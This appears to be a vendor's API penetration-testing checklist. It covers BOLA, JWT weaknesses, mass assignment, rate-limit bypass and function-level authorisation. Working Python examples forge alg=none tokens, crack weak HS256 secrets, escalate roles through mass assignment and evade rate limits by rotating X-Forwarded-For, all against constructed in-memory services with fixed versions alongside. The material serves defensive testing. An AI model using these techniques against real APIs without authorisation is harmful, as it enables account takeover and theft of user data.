Complete API Penetration Testing Checklist for Security Teams

API Penetration Testing Checklist: 10 Critical Tests

API breaches happen because automated scanners cannot detect business logic flaws. When T-Mobile exposed 37 million records and Optus leaked 9.8 million customer details, both breaches stemmed from access control failures that no scanner flagged. This checklist provides the critical penetration tests that reveal the vulnerabilities attackers actually exploit, complete with testing methods, real breach examples, and the tools you need to find these issues before attackers do.

Why API Breaches Happen

When T-Mobile exposed 37 million customer records in January 2023, the vulnerability was straightforward: an API endpoint that did not verify whether the caller had permission to access the specific record requested. Authenticated? Yes. Authorised? No.

The Optus breach in Australia was even simpler. An API endpoint required no authentication at all, so no credential was needed to pull customer records. Result: 9.8 million records exposed.

Automated scanners miss these vulnerabilities because they are business logic flaws, not code defects. A scanner sees two well-formed, authenticated requests to the same endpoint that differ only in an identifier, and both return 200. Only a tester who knows which account owns which object can tell that one request returns the caller's own data while the other returns someone else's.

According to the OWASP API Security Top 10, authorisation and business logic vulnerabilities consistently rank as the most exploited patterns in real-world attacks.

Pre-Testing Setup

Map Your API Attack Surface

Start with OpenAPI specifications, Swagger files, and Postman collections. Documentation provides the foundation, but is rarely complete. Proxy your web and mobile applications through Burp Suite or OWASP ZAP to capture actual API traffic. Shadow APIs (undocumented endpoints) often lack security controls applied to documented endpoints.

Document Authentication Mechanisms

Identify how your APIs prove identity: OAuth 2.0, JWT tokens, API keys, or Basic Auth. Note where credentials are transmitted, token lifespans, and revocation processes.

Critical distinction: Authentication proves who you are. Authorisation determines what you can access. Most API breaches stem from authorisation failures.

Define Testing Boundaries

Establish clear scope: which endpoints are in scope, maximum requests per minute, approved testing windows, escalation contacts, and systems explicitly out of scope (production databases, payment processors).

Prepare Your Testing Toolkit

Essential tools:

  • APIsec for automated continuous testing that finds business logic vulnerabilities scanners miss
  • Burp Suite Professional for traffic interception and manipulation
  • Postman for request organisation and workflow testing
  • OWASP ZAP as a free alternative with CI/CD integration
  • Python with the requests library for custom attack scenarios

Critical API Penetration Tests

1. Broken Object Level Authorisation (BOLA)

BOLA occurs when APIs verify authentication but fail to check authorisation for the specific object being requested. Create three test accounts (two regular users, one administrator), capture a valid token for each, and record which objects each account legitimately owns.

Testing steps:

  • Change user IDs in URL parameters from one account to another, using the first account's token
  • Modify object identifiers (order, document, invoice IDs) in request bodies and query strings
  • Test whether a regular user can read or modify objects owned by the other regular user and by the administrator
  • Verify authorisation at each step of multi-step workflows, not just at the first request

Example: An e-commerce API allows viewing order details through an orders endpoint. Changing the order ID from one number to another returns another customer's complete order, including name, address, and payment information.
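The cross-account probe the steps above describe, written out as an added example (this is not the article's code or any vendor tool). The orders endpoint, the accounts and the tokens are constructed in memory so the script runs offline; in a real engagement `fetch_order` would issue an HTTP request with each account's captured token. The vulnerable handler sits beside the fixed one so the same probe can be run against both.

```python
"""Cross-account BOLA probe (added example; the "API" below is a constructed stand-in)."""

# Constructed sample data: each order belongs to exactly one account.
ORDERS = {
    1001: {"owner": "alice", "total": 42.00, "card_last4": "4242"},
    1002: {"owner": "bob", "total": 17.50, "card_last4": "1111"},
    1003: {"owner": "admin", "total": 0.00, "card_last4": "0000"},
}

# Constructed "sessions": bearer token -> authenticated subject.
SESSIONS = {"tok-alice": "alice", "tok-bob": "bob", "tok-admin": "admin"}


def authenticate(token):
    """Resolve a bearer token to a user, or None if the token is invalid."""
    return SESSIONS.get(token)


def get_order_vulnerable(token, order_id):
    """Checks *who* the caller is, but never whether they own the order (BOLA)."""
    if authenticate(token) is None:
        return 401, None
    order = ORDERS.get(order_id)
    return (404, None) if order is None else (200, order)


def get_order_secure(token, order_id):
    """Same endpoint with an ownership check keyed on the authenticated subject."""
    user = authenticate(token)
    if user is None:
        return 401, None
    order = ORDERS.get(order_id)
    # Return 404 rather than 403 so the response does not confirm that the ID exists.
    if order is None or order["owner"] != user:
        return 404, None
    return 200, order


def probe_bola(fetch, accounts):
    """Request every account's objects with every *other* account's token.

    `accounts` maps token -> list of object IDs that token legitimately owns.
    `fetch(token, object_id)` returns (status, body), like an HTTP client would.
    Returns a list of (attacker_token, victim_token, object_id) findings.
    """
    findings = []
    for attacker in accounts:
        for victim, owned in accounts.items():
            if victim == attacker:
                continue
            for object_id in owned:
                status, body = fetch(attacker, object_id)
                if status == 200 and body is not None:
                    findings.append((attacker, victim, object_id))
    return findings


# Constructed ownership map: which objects each test account is allowed to see.
ACCOUNTS = {"tok-alice": [1001], "tok-bob": [1002], "tok-admin": [1003]}

if __name__ == "__main__":
    for name, handler in (("vulnerable", get_order_vulnerable), ("secure", get_order_secure)):
        hits = probe_bola(handler, ACCOUNTS)
        print(f"{name}: {len(hits)} cross-account reads", hits)
```

Against the vulnerable handler every pairing succeeds (three tokens, each reading the two objects it does not own); against the fixed handler the probe returns nothing. Keep the ownership map honest: if the administrator is genuinely entitled to read all orders, list those objects under the admin token, otherwise the probe reports expected behaviour as a finding.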

2. Broken Authentication

Weak authentication allows attackers to bypass identity verification entirely.

Testing steps:

  • Attempt to create passwords violating security policies
  • Test for account lockout after multiple failed attempts
  • Submit JWT tokens with the header algorithm set to none and the signature removed
  • Try to crack HS256 JWT signing secrets offline against a captured token using common wordlists
  • Test if OAuth authorisation codes can be reused
  • Verify tokens are invalidated on logout

Example: A financial API uses JWT tokens with a weak signing secret like "secret123". Attackers crack this using publicly available wordlists, then forge tokens for any user account.
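Both JWT checks from the steps above, the alg=none forgery and the offline dictionary attack on a weak HS256 secret, as an added example written for this page (not the article's own code). It uses only the standard library so the HMAC arithmetic is visible; the captured token, the secret "secret123" and the wordlist are constructed for the demonstration. The `verify` function shows the defender side: the algorithm is pinned server-side and the header's alg claim is never trusted.

```python
"""JWT alg=none and weak-secret checks (added example; token, secret and wordlist are constructed)."""
import base64
import hashlib
import hmac
import json
from typing import Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, secret: str) -> str:
    """Mint an HS256 token the way a typical service would."""
    header = _segment({"alg": "HS256", "typ": "JWT"})
    body = _segment(payload)
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def forge_alg_none(new_payload: dict) -> str:
    """Attacker step: header says alg=none, payload is whatever we want, signature is empty."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(new_payload)}."


def crack_hs256_secret(token: str, wordlist) -> Optional[str]:
    """Offline dictionary attack: recompute the HMAC for each candidate and compare."""
    header, body, sig = token.split(".")
    signing_input = f"{header}.{body}".encode()
    target = _b64url_decode(sig)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def verify(token: str, secret: str) -> Optional[dict]:
    """Defender step: pin the algorithm to HS256 and check the HMAC in constant time."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256":  # rejects "none" and any algorithm the service did not choose
        return None
    expected = hmac.new(secret.encode(), f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    return json.loads(_b64url_decode(body_b64))


# Constructed inputs: a weak service secret, a small wordlist, and a token "captured" from a proxy.
WEAK_SECRET = "secret123"
WORDLIST = ["password", "changeme", "jwtsecret", "secret123", "admin"]
CAPTURED = sign_hs256({"sub": "alice", "role": "user"}, WEAK_SECRET)

if __name__ == "__main__":
    recovered = crack_hs256_secret(CAPTURED, WORDLIST)
    print("recovered secret:", recovered)
    forged = sign_hs256({"sub": "admin", "role": "admin"}, recovered)
    print("forged admin token accepted:", verify(forged, WEAK_SECRET) is not None)
    none_token = forge_alg_none({"sub": "admin", "role": "admin"})
    print("alg=none token accepted:", verify(none_token, WEAK_SECRET) is not None)
```

The forged token passes because the secret is recoverable, which no verifier can defend against; the alg=none token fails only because `verify` pins the algorithm. A library that reads the algorithm from the header would accept it. In a real test, feed the captured token to a cracker such as hashcat or john with a full wordlist rather than the five entries here.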

3. Excessive Data Exposure

APIs often return complete database objects when only specific fields are needed. The write side of the same problem is mass assignment: the API accepts whatever properties the client sends and writes them to the record. The OWASP API Security Top 10 (2023) groups both under API3, Broken Object Property Level Authorisation, and the steps below cover both halves.

Testing steps:

  • Examine API responses for password hashes, internal IDs, or API keys
  • Compare responses between regular users and administrators
  • Attempt to modify restricted properties like role fields or account balance
  • Add administrator role or verified status to profile update requests

Example: A social media API returns full user profiles, including email addresses and phone numbers, in responses that the client only needs display names from. Attackers enumerate profiles through the API and harvest millions of email addresses for phishing campaigns.
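An added example for both halves of the property-level checks above (not the article's code): an allow-listed serializer against one that returns the whole record, and an allow-listed profile update against one that merges the request body straight into the record. The stored user, the field sets and the escalation request are constructed for the demonstration; `find_leaked_fields` is the tester-side check that flags sensitive keys in a response body.

```python
"""Property-level authorisation, read and write side (added example; data is constructed)."""
import copy

# Constructed stored record: far more than a profile endpoint should ever return.
STORED_USER = {
    "id": 7,
    "username": "alice",
    "display_name": "Alice",
    "email": "alice@example.test",
    "phone": "+15555550100",
    "password_hash": "$2b$12$constructedhashvalueforexample",
    "role": "user",
    "verified": False,
    "api_key": "ak_constructed_example",
}

# What a caller may see about another user, and what a user may change on themselves.
PUBLIC_FIELDS = {"id", "username", "display_name"}
SELF_WRITABLE_FIELDS = {"display_name", "email", "phone"}

# Keys whose presence in any response is a finding.
SENSITIVE_KEYS = ("password_hash", "api_key", "email", "phone")


def serialize_vulnerable(user: dict) -> dict:
    """Returns the whole database object: the excessive-data-exposure pattern."""
    return dict(user)


def serialize_public(user: dict) -> dict:
    """Allow-list the properties that leave the service."""
    return {k: v for k, v in user.items() if k in PUBLIC_FIELDS}


def update_profile_vulnerable(user: dict, body: dict) -> dict:
    """Merges the request body straight into the record: mass assignment."""
    updated = copy.deepcopy(user)
    updated.update(body)
    return updated


def update_profile_secure(user: dict, body: dict) -> tuple:
    """Apply only allow-listed fields; reject the request if anything else is present."""
    rejected = set(body) - SELF_WRITABLE_FIELDS
    if rejected:
        return 400, {"error": "unknown or read-only fields", "fields": sorted(rejected)}
    updated = copy.deepcopy(user)
    updated.update(body)
    return 200, updated


def find_leaked_fields(response: dict) -> list:
    """Tester-side check: which sensitive keys appear in a response body?"""
    return [k for k in SENSITIVE_KEYS if k in response]


# Constructed attack request: a legitimate rename carrying privilege-escalating extras.
ESCALATION_BODY = {"display_name": "Alice", "role": "admin", "verified": True}

if __name__ == "__main__":
    print("leaked by vulnerable serializer:", find_leaked_fields(serialize_vulnerable(STORED_USER)))
    print("leaked by allow-listed serializer:", find_leaked_fields(serialize_public(STORED_USER)))
    print("role after vulnerable update:", update_profile_vulnerable(STORED_USER, ESCALATION_BODY)["role"])
    print("secure update status:", update_profile_secure(STORED_USER, ESCALATION_BODY)[0])
```

Rejecting the request outright, rather than silently dropping the extra fields, is the safer default for a profile endpoint: silent dropping hides the attempt from logging and lets a client keep probing for a property name that is not on the deny-list.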

4. Unrestricted Resource Consumption

APIs without resource controls enable denial-of-service attacks or excessive data harvesting.

Testing steps:

  • Send hundreds of concurrent requests and monitor response times
  • Submit extremely large JSON payloads (multiple megabytes)
  • Test resource-intensive endpoints like report generation or data exports
  • Request maximum records without pagination limits
  • Verify that rate limiting exists and cannot be bypassed by rotating client-controlled values such as the X-Forwarded-For header, API keys, or freshly created accounts

Example: An e-commerce API allows product searches without rate limiting. An attacker scripts thousands of complex queries per second, overwhelming the database.
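An added example of the bypass check in the last step above (not the article's code): a fixed-window limiter in front of the search endpoint, keyed two ways. Keying on X-Forwarded-For, a header the client controls, is reset by every request that changes the header; keying on the authenticated subject (falling back to the socket peer) holds. The limiter, the requests and the clock values are constructed, so the script runs offline.

```python
"""Rate-limit keying and header-rotation bypass (added example; requests are constructed)."""
from collections import defaultdict

LIMIT = 10      # requests allowed per window
WINDOW = 60.0   # window length in seconds


class FixedWindowLimiter:
    """Counts requests per key inside a fixed time window."""

    def __init__(self, key_func):
        self.key_func = key_func
        self.counts = defaultdict(int)
        self.window_start = defaultdict(float)

    def allow(self, request: dict, now: float) -> bool:
        key = self.key_func(request)
        if now - self.window_start[key] >= WINDOW:
            self.window_start[key] = now
            self.counts[key] = 0
        self.counts[key] += 1
        return self.counts[key] <= LIMIT


def key_by_forwarded_for(request: dict) -> str:
    """Weak: trusts X-Forwarded-For, which the client can set to anything."""
    return request["headers"].get("X-Forwarded-For", request["peer_ip"])


def key_by_subject(request: dict) -> str:
    """Stronger: key on the authenticated subject, falling back to the socket peer."""
    return request.get("subject") or request["peer_ip"]


def flood(limiter: FixedWindowLimiter, build_request, n: int, start: float = 0.0) -> int:
    """Fire n requests 100 ms apart (all inside one window) and count how many are accepted."""
    return sum(1 for i in range(n) if limiter.allow(build_request(i), start + i * 0.1))


def attacker_rotating_xff(i: int) -> dict:
    """One socket, one account, a fresh spoofed X-Forwarded-For on every request."""
    return {
        "peer_ip": "203.0.113.9",          # TEST-NET address, constructed
        "subject": "bob",
        "headers": {"X-Forwarded-For": f"10.0.{i // 256}.{i % 256}"},
    }


if __name__ == "__main__":
    weak = FixedWindowLimiter(key_by_forwarded_for)
    strong = FixedWindowLimiter(key_by_subject)
    print("accepted with X-Forwarded-For keying:", flood(weak, attacker_rotating_xff, 500))
    print("accepted with subject keying:", flood(strong, attacker_rotating_xff, 500))
```

During a test, send a burst of identical requests until you are throttled, then repeat with a changing X-Forwarded-For value, a second API key, and a second account; each variant that lifts the throttle is a separate finding. Limiting by subject still leaves the unauthenticated surface (login, signup, password reset) to be keyed on the real peer address as seen by the edge, never on a header the edge does not itself set.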

5. Broken Function Level Authorisation (BFLA)

BFLA occurs when APIs fail to restrict access to administrative functions.

Testing steps:

  • Change GET requests to DELETE, PUT, or PATCH methods
  • Add admin or internal paths to existing API URLs
  • Include administrator flags in request bodies
  • Test access to debugging endpoints

Example: A document management API allows users to view documents via a GET request. An attacker changes the method to DELETE while keeping the same URL structure and successfully deletes documents.
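The verb-tampering check from the steps above as an added example (not the article's code). A constructed in-memory router stands in for the document API: the vulnerable version authorises the path once and then dispatches on the method, so a user who may GET a document can also DELETE it; the fixed version authorises the (method, path) pair. `verb_matrix` is the tester step, every method against every path with a low-privilege token, and `privileged_hits` reduces the matrix to findings.

```python
"""Function-level authorisation probe by method switching (added example; router is constructed)."""

# Constructed tokens, documents and a permission table keyed on the *function*, i.e. (method, path template).
ROLES = {"tok-user": "user", "tok-admin": "admin"}
DOCUMENTS = {"doc-1": "quarterly report"}
PERMISSIONS = {
    ("GET", "/documents/{id}"): {"user", "admin"},
    ("DELETE", "/documents/{id}"): {"admin"},
    ("GET", "/admin/users"): {"admin"},
}
PATHS = ["/documents/doc-1", "/admin/users"]
METHODS = ("GET", "POST", "PUT", "PATCH", "DELETE")


def _match(path: str):
    """Map a concrete path to its template and object id."""
    if path.startswith("/documents/"):
        return "/documents/{id}", path[len("/documents/"):]
    return path, None


def route_vulnerable(method: str, path: str, token: str, store: dict) -> int:
    """Authorises the path as if it were a GET, then dispatches on the real method (BFLA)."""
    role = ROLES.get(token)
    if role is None:
        return 401
    template, doc_id = _match(path)
    if role not in PERMISSIONS.get(("GET", template), set()):  # bug: method ignored here
        return 403
    if method == "DELETE" and doc_id in store:
        del store[doc_id]
        return 204
    if method == "GET":
        return 200 if doc_id is None or doc_id in store else 404
    return 405


def route_secure(method: str, path: str, token: str, store: dict) -> int:
    """Authorises the (method, path) pair before doing anything."""
    role = ROLES.get(token)
    if role is None:
        return 401
    template, doc_id = _match(path)
    allowed = PERMISSIONS.get((method, template))
    if allowed is None:
        return 405
    if role not in allowed:
        return 403
    if method == "DELETE":
        if doc_id not in store:
            return 404
        del store[doc_id]
        return 204
    return 200 if doc_id is None or doc_id in store else 404


def verb_matrix(router, token: str, paths=PATHS, methods=METHODS) -> dict:
    """Tester step: send every method to every path with one token; record the status codes."""
    results = {}
    for path in paths:
        for method in methods:
            store = dict(DOCUMENTS)  # fresh copy so a successful DELETE does not mask later probes
            results[(method, path)] = router(method, path, token, store)
    return results


def privileged_hits(matrix: dict, role: str) -> list:
    """Findings: 2xx responses for functions the token's role is not allowed to call."""
    hits = []
    for (method, path), status in matrix.items():
        allowed = PERMISSIONS.get((method, _match(path)[0]))
        if allowed is not None and role not in allowed and 200 <= status < 300:
            hits.append((method, path, status))
    return hits


if __name__ == "__main__":
    for name, router in (("vulnerable", route_vulnerable), ("secure", route_secure)):
        print(name, privileged_hits(verb_matrix(router, "tok-user"), "user"))
```

Run the matrix with the lowest-privilege token you hold and treat any 2xx on a method the role should not have as a finding; a 405 on an unlisted method is the correct answer, and a 403 that only appears after the handler has already performed the action (check the store) is a finding too.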

6. Sensitive Business Flow Protection

Critical business processes need protection from automation and abuse.

Testing steps:

  • Script the complete workflow end to end and check whether any anti-automation control (CAPTCHA, device fingerprinting, per-account throttling) interrupts it
  • Test if you can apply multiple discount codes or reuse codes
  • Attempt to create thousands of accounts rapidly
  • Complete purchases without submitting payment
  • Reserve inventory indefinitely without completing checkout

Example: A ticket marketplace API allows adding concert tickets to carts without rate limiting. Scalper bots add all available tickets to multiple carts, holding inventory while legitimate customers cannot purchase.

Essential Testing Tools

  • APIsec automates comprehensive API security testing by analysing your specifications and generating thousands of intelligent attack scenarios. Unlike traditional scanners, APIsec tests business logic, authorisation patterns, and the complete OWASP API Top 10. The platform delivers real vulnerabilities with proof of exploitation, eliminating false positives that waste security team time.
  • Burp Suite Professional remains the industry standard for manual testing. The proxy intercepts all HTTP and HTTPS traffic, the repeater modifies and replays requests, and the intruder automates attack patterns. Extensions add specialised API testing capabilities.
  • Postman excels at API exploration. Organise requests into collections, use environment variables for multi-instance testing, and chain requests for complex workflows.
  • OWASP ZAP provides a free alternative with strong automated scanning and good CI/CD integration capabilities.
  • Python with the requests library gives complete control for complex scenarios, easy JWT manipulation, and multi-step attack chains.

Compare more options in our API security testing tools guide.

When to Automate API Testing

Manual penetration testing provides depth, but can't match modern development velocity. Security teams need both approaches.

Automate these tests:

  • OWASP API Top 10 baseline checks
  • Authentication mechanism verification
  • Input validation across endpoints
  • Regression testing for known vulnerabilities

Keep manual testing for:

  • Complex business logic analysis
  • Multi-step attack chain development
  • Context-specific authorisation testing
  • Novel vulnerability research

Integrate automated API security testing into CI/CD pipelines for baseline security with every release. Manual testing then focuses on deep analysis of business logic and complex attack scenarios.

Conclusion

API security requires testing for business logic flaws that automated scanners miss. This checklist covers the most exploited vulnerability classes from the OWASP API Security Top 10, from BOLA and broken authentication to unrestricted resource consumption and abuse of sensitive business flows. Security teams need both manual testing for complex authorisation issues and automated platforms for continuous coverage as development teams ship new features daily.

Start your free API security scan with APIsec to find real vulnerabilities in minutes, not weeks.

Key Takeaways

  • BOLA and broken authentication cause most API breaches, but scanners miss the authorisation logic behind them
  • Use Burp Suite, Postman, OWASP ZAP, and APIsec to intercept and manipulate API traffic.
  • Test authorisation at every endpoint by accessing other users' data and admin functions.
  • Manual testing takes 1 to 2 weeks for medium APIs, while automated platforms finish in hours.
  • Automate OWASP API Top 10 testing and use manual testing for business logic vulnerabilities
  • Test production APIs safely with read-only operations, off-peak timing, and team coordination

FAQs

How long does API penetration testing take?

Simple APIs with 20 to 50 endpoints take 2 to 3 days. Medium APIs with 50 to 200 endpoints take 1 to 2 weeks. Complex APIs with over 200 endpoints take 2 to 4 weeks. Automated platforms complete baseline testing in hours.

How often should APIs be tested?

Test before major releases, after architecture changes, and annually for compliance. Continuous automated testing catches vulnerabilities as they're introduced rather than months later.

What's the difference between penetration testing and vulnerability scanning?

Vulnerability scanners use pattern matching to find known issues. Penetration testing applies human intelligence to find business logic flaws and context-specific vulnerabilities that scanners miss.

Can production APIs be tested safely?

Production testing is possible with precautions: use read-only operations where feasible, test during low-traffic periods, implement strict rate limiting, coordinate with operations teams, and maintain rollback procedures.
